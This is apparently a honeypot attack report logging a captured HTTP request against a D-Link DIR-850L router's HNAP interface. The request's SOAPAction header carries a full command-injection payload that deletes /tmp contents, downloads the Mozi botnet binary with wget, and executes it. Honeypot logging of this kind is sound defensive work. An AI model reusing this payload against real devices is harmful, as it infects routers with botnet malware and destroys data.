Attack Report for Detail

Header

Time

2022/09/14, 08:16:26 (GMT)

Transaction ID

1CTPWXHZNT5JMV60

Service

http

Location

CN (China)

Attacker

27.43.205.8

Classification

D-link overflow

Harm Potential

High

Description

D-Link DIR-850L web admin interface contains a stack-based buffer overflow vulnerability

Content

POST /HNAP1/ HTTP/1.0
Host: ***.***.***.***:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

All details are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate